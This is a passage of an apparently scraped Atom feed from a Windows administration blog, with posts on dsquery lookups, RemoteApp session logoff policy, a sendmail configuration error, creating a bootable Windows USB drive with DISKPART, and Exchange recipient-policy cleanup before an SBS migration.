<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-632842891872466482</id><updated>2011-11-28T10:19:45.765+11:00</updated><category term='Internet Explorer Tips'/><category term='Hard Disk OR Drivers'/><category term='XP Desktop Tips'/><category term='Games Tips'/><title type='text'>Windows Solutions, AD, DNS, DHCP, Migration, UPgrade, IIS, SSL, VPN</title><subtitle type='html'>Karnav Thakar.
B.B.A, N+ CompTIA, MCP, MCSA, MCSE</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>85</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-679770998206258333</id><published>2011-05-17T09:36:00.002+10:00</published><updated>2011-05-17T09:36:56.466+10:00</updated><title type='text'>How to find DN path for Users, Security Gruop, etc.</title><content type='html'>&lt;strong&gt;&lt;span style="color: red;"&gt;cmd /k dsquery group -name "Security Group Name"&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="color: red;"&gt;cmd /k dsquery&amp;nbsp;User -name "Username"&lt;/span&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-679770998206258333?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/679770998206258333/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=679770998206258333&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/679770998206258333'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/679770998206258333'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2011/05/how-to-find-dn-path-for-users-security.html' title='How to find DN path for Users, Security Gruop, etc.'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-5833785996898335725</id><published>2011-05-17T00:58:00.000+10:00</published><updated>2011-05-17T00:58:27.874+10:00</updated><title type='text'>Terminal Services RemoteApp™ Session Termination Logic</title><content type='html'>&lt;div class="post-content user-defined-markup"&gt;&lt;h3&gt;Terminal Services RemoteApp™ Session Termination Logic&lt;/h3&gt;There  are several heuristics and session time limit Group Policy settings  that dictate the lifetime of a RemoteApp session. The main difference in  behavior between a RemoteApp session and a regular full desktop session  is that there is no explicit way for the user to either log off or  disconnect a RemoteApp session. &lt;br /&gt;The procedure for when to end a  RemoteApp session involves two stages. In the first stage, heuristics  are applied to determine whether the session needs to be disconnected.  If the session needs to be disconnected, stage two is triggered. In  stage two, Group Policy settings are used to decide if and when to log  off the disconnected RemoteApp session. &lt;br /&gt;&lt;h3&gt;Stage I: When should the RemoteApp session be disconnected?&lt;/h3&gt;Several  factors are considered in deciding when to disconnect a RemoteApp  session. The session disconnection is triggered when all RemoteApp  windows and user launched system tray icons are closed. The following  flow chart shows the decision-making process. Each step is discussed in  detail below. &lt;br /&gt;&lt;img height="628" src="http://blogs.msdn.com/blogfiles/ts/WindowsLiveWriter/TerminalServicesRemoteAppSessionTerminat_E859/clip_image002_1.gif" width="206" /&gt; &lt;br /&gt;1. A RemoteApp session remains active as long as there is at least one visible or active window in that session. &lt;br /&gt;- The active window could be in any of the window states (minimized, maximized or restored). &lt;br /&gt;- The active window could belong to an application that was either started directly or indirectly as a RemoteApp program. &lt;br /&gt;Scenario:  A user double-clicks the Remote Outlook icon to start Microsoft® Office  Outlook®. [Outlook is the directly started application]. The user then  opens an e-mail with a Word attachment and opens the document. This  starts Word in the session. [Word is the indirectly started  application]. The session will remain active until both the Outlook and  Word windows are closed. &lt;br /&gt;2. A RemoteApp session remains active as  long as there is at least one notification area (system tray) icon of  an application that was started directly or indirectly by the user. &lt;br /&gt;Scenario:  A user double-clicks the Remote Microsoft Office Communicator icon.  After the application is started, the remote notification area icon for  Communicator is also shown in the client’s notification area. Even if  the main window of Communicator is closed, the application is still  running in the background. The session will remain active. &lt;br /&gt;Note  that a remote notification area icon that is not explicitly started by  the user is not taken into consideration as part of decision 2. &lt;br /&gt;Scenario:  A user double-clicks the Remote Outlook icon to start Outlook. As part  of the logon script, the antivirus software client also starts and  appears in the notification area. If the remote Outlook window is closed  by the user, the remote notification area icon that belongs to the  antivirus program is ignored because it was not started (either directly  or indirectly) by the user. &lt;br /&gt;3. If the answers to decision 1 and  decision 2 are both “No,” there are no RemoteApp programs running in the  session. At this point, there is a 20 second wait, in case the user  wants to start another RemoteApp program on the same server, or if the  recently closed RemoteApp program displays any messages upon closure. If  the user chooses not to start any more remote programs in this period,  the RemoteApp session will be disconnected and the client process  (mstsc.exe) will exit. &lt;br /&gt;&lt;h3&gt;Stage II – Setting the time delay for the logoff from a disconnected RemoteApp session&lt;/h3&gt;You can use the &lt;b&gt;Session Time Limits&lt;/b&gt;  policy settings for Terminal Services sessions to set the time limit  for RemoteApp sessions. Typically, administrators use these policy  settings for scalability reasons. &lt;br /&gt;&lt;h4&gt;New Group Policy setting—RemoteApp session logoff delay &lt;/h4&gt;There  is a new policy setting introduced in Windows Server 2008 that allows  for the administrator to set the time delay for the logoff from a  disconnected RemoteApp session. As it is much faster to connect to a  disconnected session as opposed to starting a new session, you can use  this policy setting to provide a faster startup times when a user  launches a new RemoteApp on the same server. Based on server  performance, an administrator must determine a time limit that provides  the best user experience, while not overwhelming server resources by  permitting these "no remote program running" RemoteApp sessions to  remain in a disconnected state. &lt;br /&gt;&lt;h5&gt;What is the default setting for the “Set time limit for logoff of RemoteApp sessions” policy setting?&lt;/h5&gt;By default, RemoteApp sessions will remain in a disconnected state indefinitely.  &lt;br /&gt;&lt;h5&gt;Where are the session time limit policy settings located?&lt;/h5&gt;To locate the session time limit policy settings, follow these steps: &lt;br /&gt;1. Log on to the terminal server as an administrator. &lt;br /&gt;2. Start the Local Group Policy Editor. To do this, click &lt;b&gt;Start&lt;/b&gt;, click &lt;b&gt;Run&lt;/b&gt;, type &lt;b&gt;gpedit.msc&lt;/b&gt;, and then click &lt;b&gt;OK&lt;/b&gt;. &lt;br /&gt;3. Locate the following node:  &lt;br /&gt;&lt;b&gt;Computer Configuration\Administrative Templates\Windows Components\Terminal Services\Terminal Server\Session Time Limits&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Note&lt;/b&gt;: The policy settings are also located under &lt;b&gt;User Configuration\Administrative Templates\Windows Components\Terminal Services\Terminal Server\Session Time Limits&lt;/b&gt; &lt;br /&gt;4. The new policy—&lt;b&gt;Set time limit for logoff of RemoteApp sessions&lt;/b&gt;—is shown in the following figure: &lt;br /&gt;&lt;img height="269" src="http://blogs.msdn.com/blogfiles/ts/WindowsLiveWriter/TerminalServicesRemoteAppSessionTerminat_E859/clip_image004_1.jpg" width="620" /&gt; &lt;br /&gt;&lt;h4&gt;How do I enable the time limit for logoff delay?&lt;/h4&gt;&lt;img height="463" src="http://blogs.msdn.com/blogfiles/ts/WindowsLiveWriter/TerminalServicesRemoteAppSessionTerminat_E859/clip_image006_1.jpg" width="407" /&gt; &lt;br /&gt;To enable the “Set time limit for logoff of RemoteApp sessions” policy setting, follow these steps: &lt;br /&gt;1. In the right pane of the Local Group Policy Editor, double-click &lt;b&gt;Set time limit for logoff of RemoteApp sessions&lt;/b&gt;. &lt;br /&gt;2. Click &lt;b&gt;Enabled&lt;/b&gt;. &lt;br /&gt;3. In the &lt;b&gt;RemoteApp session logoff delay&lt;/b&gt; list, select the desired time for logoff delay, and then click &lt;b&gt;OK&lt;/b&gt;. &lt;br /&gt;4. At a command prompt, type &lt;b&gt;gpupdate&lt;/b&gt;, and then press ENTER to force the policy to refresh immediately on the local computer. &lt;br /&gt;After the policy setting is enabled, disconnected RemoteApp sessions will be logged off after the configured time delay. &lt;br /&gt;Scenario:  Consider a typical work day where a user closes their RemoteApp  programs when they leave work at 5:00 P.M. When they return to work at  8:00 A.M. the following day, they start their RemoteApp programs again.  Assume that the administrator has chosen 18 hours as the time limit for  RemoteApp session logoff. When the user returns in the morning and  restarts their programs, the remote programs will start quickly. Even if  the user logs on after 19 hours, there is no possibility for data loss  because there are no remote programs running in the session. Unlike  existing session time limit policies, there is no threat of data loss  because the policy setting applies only to RemoteApp sessions that have  no remote programs running that were started by the user. Therefore, you  should configure this new policy setting with the goal of providing the  better user experience. &lt;br /&gt;&lt;h4&gt;Is there any possibility of conflict between the RemoteApp logoff policy setting and other session limit policy settings?&lt;/h4&gt;We  recommend that you set other session limit policy settings that end the  session to a time limit that is higher than the RemoteApp logoff delay  policy setting. If this is not the case, there is a possibility for  conflict.  &lt;br /&gt;Scenario: Extending the scenario mentioned earlier,  assume that the administrator has also set the “Set time limit for  disconnected sessions” policy setting to two days. When a user leaves  work at 5:00 P.M. on Friday, by the time that they return to work at  8:00 A.M. on Monday, their session would be logged off. In this manner,  the administrator can choose to log off the disconnected sessions that  are taking up server resources. If the administrator decides to end the  session in 12 hours instead of two days, the RemoteApp logoff policy  setting that was set for 18 hours has no effect. After 12 hours, the  session will be logged off.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-5833785996898335725?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://blogs.msdn.com/b/rds/archive/2007/09/28/terminal-services-remoteapp-session-termination-logic.aspx' title='Terminal Services RemoteApp™ Session Termination Logic'/><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/5833785996898335725/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=5833785996898335725&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/5833785996898335725'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/5833785996898335725'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2011/05/terminal-services-remoteapp-session.html' title='Terminal Services RemoteApp™ Session Termination Logic'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-5692935853728177255</id><published>2011-01-20T21:13:00.000+11:00</published><updated>2011-01-20T21:13:33.808+11:00</updated><title type='text'>/etc/mail/sendmail.cf : line 91 -- Sendmail error</title><content type='html'>Sendmail Fails to restart. &lt;br /&gt;Starting sendmail : 451 4.0.0 /etc/mail/sendmail.cf : line 91 : fileclass : &lt;br /&gt;Cannot open '/etc/mail/local-host-names' : World writable Directory &lt;br /&gt;&lt;br /&gt;Recently i have faced a problem with Sendmail server, it failed to start &lt;br /&gt;throwing a strange Error - &lt;br /&gt;&lt;br /&gt;Starting sendmail : 451 4.0.0 /etc/mail/sendmail.cf : line 91 : fileclass : &lt;br /&gt;Cannot open '/etc/mail/local-host-names' : World writable Directory &lt;br /&gt;Starting sendmail : 451 4.0.0 /etc/mail/sendmail.cf : line 588 : fileclass : &lt;br /&gt;Cannot open '/etc/mail/local-host-names' : World writable Directory &lt;br /&gt;Starting sm-client : /etc/mail/submit.cf : line 545 : fileclass : Cannot &lt;br /&gt;open '/etc/mail/local-host-names' : World writable Directory &lt;br /&gt;&lt;br /&gt;Well there is nothing strange 'bout the error alone, but with the fact that &lt;br /&gt;the permission to /etc/mail/* is perfectly ok, none of the files or folder &lt;br /&gt;has permission to be written by any user then owner that is root. The &lt;br /&gt;sendmail.cf and submit.cf has never been touched and sendmail was running &lt;br /&gt;fine just before rebooting the system. &lt;br /&gt;&lt;br /&gt;Well got the solution and it worked for me, edit the file &lt;br /&gt;/etc/mail/sendmail.cf and add -o ('oh') to line 91 and 588 that is change &lt;br /&gt;Fw/etc/mail/local-host-names to Fw-o /etc/mail/local-host-names. Similarly &lt;br /&gt;edit /etc/mail/submit.cf and add -o that is change Ft/etc/mail/trusted-users &lt;br /&gt;to Ft-o /etc/mail/trusted-users.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-5692935853728177255?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/5692935853728177255/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=5692935853728177255&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/5692935853728177255'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/5692935853728177255'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2011/01/etcmailsendmailcf-line-91-sendmail.html' title='/etc/mail/sendmail.cf : line 91 -- Sendmail error'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8095711828696831985</id><published>2011-01-06T11:01:00.000+11:00</published><updated>2011-01-06T11:01:08.279+11:00</updated><title type='text'>Bootable USB Device / Install Vista VIA USB / Bootable USB</title><content type='html'>&lt;div class="ii gt" id=":1us"&gt;&lt;div id=":1ur"&gt;This guide works 100% for  Vista &amp;amp; Windows 7 unlike most of the guides out there. I have seen  many sites/blogs that have “Install Vista from &lt;span class="il"&gt;USB&lt;/span&gt;  guide” but either with incomplete steps or not working guide. I have  also seen some guides that don’t’ use proper commands in this guide.  After spending many hours I have come up with this 100% working guide.&lt;br /&gt;&lt;img src="http://www.intowindows.com/wp-content/uploads/2009/01/disk.jpg" /&gt;&lt;br /&gt;I just did this method on one of my friends machine and installed the new Windows 7 BETA. The main advantage is that by using &lt;span class="il"&gt;USB&lt;/span&gt; drive you will be able to install Windows 7/Vista in just 15 minutes. You can also use this &lt;span class="il"&gt;bootable&lt;/span&gt; &lt;span class="il"&gt;USB&lt;/span&gt; drive on friend’s computer who doesn’t have a DVD optical drive.&lt;br /&gt;The method is very simple and you can use without any hassles. Needless to say that your motherboard should support &lt;span class="il"&gt;USB&lt;/span&gt; Boot feature to make use of the &lt;span class="il"&gt;bootable&lt;/span&gt; &lt;span class="il"&gt;USB&lt;/span&gt; drive.&lt;br /&gt;&lt;b&gt;Requirements:&lt;/b&gt;&lt;br /&gt;*&lt;span class="il"&gt;USB&lt;/span&gt; Flash Drive (Minimum 4GB)&lt;br /&gt;*Windows 7 or Vista installation files.&lt;br /&gt;Follow the below steps to create &lt;span class="il"&gt;bootable&lt;/span&gt; Windows 7/Vista &lt;span class="il"&gt;USB&lt;/span&gt; drive using which you can install Windows 7/Vista easily.&lt;br /&gt;&lt;b&gt;1&lt;/b&gt;. Plug-in your &lt;span class="il"&gt;USB&lt;/span&gt; flash drive to &lt;span class="il"&gt;USB&lt;/span&gt; port and move all the contents from &lt;span class="il"&gt;USB&lt;/span&gt; drive to a safe location on your system.&lt;br /&gt;&lt;b&gt;2&lt;/b&gt;. Open Command Prompt with admin rights. Use any of the below methods to open Command Prompt with admin rights.&lt;br /&gt;*Type&lt;b&gt; cmd&lt;/b&gt; in Start menu search box and hit&lt;b&gt; Ctrl&lt;/b&gt;+ &lt;b&gt;Shift&lt;/b&gt;+ &lt;b&gt;Enter&lt;/b&gt;.&lt;br /&gt;Or&lt;br /&gt;*Go to Start menu &amp;gt; All programs &amp;gt; Accessories, right click on Command Prompt and select Run as administrator.&lt;br /&gt;&lt;b&gt;3&lt;/b&gt;. You need to know about the &lt;span class="il"&gt;USB&lt;/span&gt; drive a little bit. Type in the following commands in the command prompt:&lt;br /&gt;First type &lt;b&gt;DISKPART&lt;/b&gt; and hit enter to see the below message.&lt;br /&gt;&lt;img src="http://www.intowindows.com/wp-content/uploads/2009/01/12.jpg" /&gt;&lt;br /&gt;Next type &lt;b&gt;LIST DISK&lt;/b&gt; command and note down the Disk number (ex: Disk 1) of your &lt;span class="il"&gt;USB&lt;/span&gt; flash drive. In the below screenshot my Flash Drive Disk no is &lt;b&gt;Disk 1&lt;/b&gt;.&lt;br /&gt;&lt;b&gt;4&lt;/b&gt;. Next type all the below commands one by one. Here I assume that your disk drive no is “&lt;b&gt;Disk 1&lt;/b&gt;”.If you have Disk 2 as your &lt;span class="il"&gt;USB&lt;/span&gt; flash drive then use Disk 2.Refer the above step to confirm it.&lt;br /&gt;So below are the commands you need to type and execute one by one:&lt;br /&gt;&lt;b&gt;SELECT DISK 1 &lt;/b&gt;&lt;br /&gt;&lt;b&gt;CLEAN&lt;/b&gt;&lt;br /&gt;&lt;b&gt;CREATE PARTITION PRIMARY&lt;/b&gt;&lt;br /&gt;&lt;b&gt;SELECT PARTITION 1&lt;/b&gt;&lt;br /&gt;&lt;b&gt;ACTIVE&lt;/b&gt;&lt;br /&gt;&lt;b&gt;FORMAT FS=NTFS&lt;/b&gt;&lt;br /&gt;(Format process may take few seconds)&lt;br /&gt;&lt;b&gt;ASSIGN&lt;/b&gt;&lt;br /&gt;&lt;b&gt;EXIT&lt;/b&gt;&lt;br /&gt;Don’t close the command prompt as we need to execute one more command at the next step. Just minimize it.&lt;br /&gt;&lt;img src="http://www.intowindows.com/wp-content/uploads/2009/01/115.jpg" /&gt;&lt;br /&gt;&lt;b&gt;5&lt;/b&gt;. Next insert your Windows7/Vista DVD into the optical drive  and check the drive letter of the DVD drive. In this guide I will assume  that your DVD drive letter is “D” and &lt;span class="il"&gt;USB&lt;/span&gt; drive letter is “H” (open my computer to know about it).&lt;br /&gt;&lt;b&gt;6&lt;/b&gt;. Maximize the minimized Command Prompt in the 4th step.Type&amp;nbsp; the following command now:&lt;br /&gt;&lt;b&gt;D:CD BOOT&lt;/b&gt; and hit enter.Where “D” is your DVD drive letter.&lt;br /&gt;&lt;b&gt;CD BOOT&lt;/b&gt; and hit enter to see the below message.&lt;br /&gt;&lt;b&gt;7&lt;/b&gt;. Type another command given below to update the &lt;span class="il"&gt;USB&lt;/span&gt; drive with BOOTMGR compatible code.&lt;br /&gt;&lt;b&gt;BOOTSECT.EXE/NT60 H&lt;/b&gt;:&lt;br /&gt;&lt;img src="http://www.intowindows.com/wp-content/uploads/2009/01/14.jpg" /&gt;&lt;br /&gt;Where “H” is your &lt;span class="il"&gt;USB&lt;/span&gt; drive letter. Once you enter the above command you will see the below message.&lt;br /&gt;&lt;b&gt;8&lt;/b&gt;. Copy your Windows 7/Vista DVD contents to the &lt;span class="il"&gt;USB&lt;/span&gt; flash drive.&lt;br /&gt;&lt;b&gt;9&lt;/b&gt;. Your &lt;span class="il"&gt;USB&lt;/span&gt; drive is ready to boot and install Windows 7/Vista. Only thing you need to change the boot priority at the BIOS to &lt;span class="il"&gt;USB&lt;/span&gt; from the HDD or CD ROM drive. I won’t explain it as it’s just the matter the changing the boot priority or enabling the &lt;span class="il"&gt;USB&lt;/span&gt; boot option in the BIOS.&lt;br /&gt;Note: If you are not able to boot after following this guide means you haven’t set the BIOS priority to &lt;span class="il"&gt;USB&lt;/span&gt;. If you got any problem in following this guide feel free to ask questions by leaving comment.&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8095711828696831985?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8095711828696831985/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8095711828696831985&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8095711828696831985'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8095711828696831985'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2011/01/bootable-usb-device-install-vista-via.html' title='Bootable USB Device / Install Vista VIA USB / Bootable USB'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-18033012643502314</id><published>2011-01-03T20:10:00.000+11:00</published><updated>2011-01-03T20:10:42.493+11:00</updated><title type='text'>Off topic: When Windows NLB won't NLB (Quick Tip)...</title><content type='html'>&lt;a href="http://www.telnetport25.com/en/component/content/article/22-windows-load-balancing/137-off-topic-when-windows-nlb-wont-nlb-quick-tip.html?sms_ss=blogger&amp;amp;at_xt=4d2192694646b663%2C0"&gt;Off topic: When Windows NLB won't NLB (Quick Tip)...&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Windows Server 2008 Terminal server load balancing on Cluster enviroment&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-18033012643502314?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.telnetport25.com/en/component/content/article/22-windows-load-balancing/137-off-topic-when-windows-nlb-wont-nlb-quick-tip.html?sms_ss=blogger&amp;at_xt=4d2192694646b663%2C0' title='Off topic: When Windows NLB won&apos;t NLB (Quick Tip)...'/><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/18033012643502314/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=18033012643502314&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/18033012643502314'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/18033012643502314'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2011/01/off-topic-when-windows-nlb-wont-nlb.html' title='Off topic: When Windows NLB won&apos;t NLB (Quick Tip)...'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-3844861485124238112</id><published>2011-01-03T10:43:00.000+11:00</published><updated>2011-01-03T10:43:36.873+11:00</updated><title type='text'>Exchangepedia: iPhone OS 3.1 Security Changes and Exchange ActiveSync Policy</title><content type='html'>&lt;a href="http://www.exchangepedia.com/blog/2009/09/iphone-os-31-security-changes-and.html"&gt;Exchangepedia: iPhone OS 3.1 Security Changes and Exchange ActiveSync Policy&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-3844861485124238112?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.exchangepedia.com/blog/2009/09/iphone-os-31-security-changes-and.html' title='Exchangepedia: iPhone OS 3.1 Security Changes and Exchange ActiveSync Policy'/><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/3844861485124238112/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=3844861485124238112&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3844861485124238112'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3844861485124238112'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2011/01/exchangepedia-iphone-os-31-security.html' title='Exchangepedia: iPhone OS 3.1 Security Changes and Exchange ActiveSync Policy'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-3816492204973145366</id><published>2010-12-17T08:12:00.000+11:00</published><updated>2010-12-17T08:12:32.219+11:00</updated><title type='text'>SBS 2003 BPA question Managed Recipient Policies</title><content type='html'>Hi to all,&lt;br /&gt;&lt;br /&gt;I am planning a migration to sbs 2008 in the near future, still working on&lt;br /&gt;choosing the hardware phase.&lt;br /&gt;&lt;br /&gt;Just ran the SBS BPA today and got a warning that I can't seem to find an&lt;br /&gt;answer for:&lt;br /&gt;&lt;br /&gt;Managed Recipient Policies&lt;br /&gt;The Mailbox Manager setting is enabled for one or more recipient policies.&lt;br /&gt;As a result, the recipient policies will not be upgraded if you migrate to&lt;br /&gt;Windows SBS 2008 and Exchange Server 2007.&lt;br /&gt;I checked some blogs and tpis twaks,&lt;br /&gt;&lt;br /&gt;Answer for this problem is&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_ZIjWENX5vtM/TQqAgl1oDEI/AAAAAAAAAVY/2dpziry0sUQ/s1600/ss2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="194" src="http://3.bp.blogspot.com/_ZIjWENX5vtM/TQqAgl1oDEI/AAAAAAAAAVY/2dpziry0sUQ/s320/ss2.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_ZIjWENX5vtM/TQqAhOsCZeI/AAAAAAAAAVc/Mz9jGuiSUqo/s1600/SS1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="294" src="http://4.bp.blogspot.com/_ZIjWENX5vtM/TQqAhOsCZeI/AAAAAAAAAVc/Mz9jGuiSUqo/s320/SS1.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;=============&lt;br /&gt;If you have Exchange 2003 or Exchange 2000 policies that are BOTH E-mail  Addresses and Mailbox Manager policies (they have both the Mailbox  Manager Settings&lt;br /&gt;(Policy) tab and the E-mail Addresses (Policy) tab), perform the  following steps to remove the mailbox manager portion of the policy:&lt;br /&gt;&lt;br /&gt;1. In Exchange System Manager, expand Recipients, and then select Recipient Policies.&lt;br /&gt;2. Right-click the policy, and then select Change property pages.&lt;br /&gt;3. Clear the Mailbox Manager Settings check box, and then click OK. Please reffere to above images.&lt;br /&gt;&lt;br /&gt;How to check for duplicate/invalid SMTP addresses in recipient policies:&lt;br /&gt;&lt;br /&gt;1. In Exchange System Manager, expand Recipients, and then select Recipient Policies.&lt;br /&gt;2. Right-click the policy, and then select E-Mail Addresses (Policy) tab.&lt;br /&gt;3. Inspect the SMTP Addresses for any that are unchecked. If you find any, place a check in the box or remove that address.&lt;br /&gt;4. Inspect the SMTP Addresses for any that have an IP address. For  instance, @192.168.1.1. If you find any, remove those addresses that  contain an IP address.&lt;br /&gt;5. Click OK.&lt;br /&gt;=============&lt;br /&gt;&lt;br 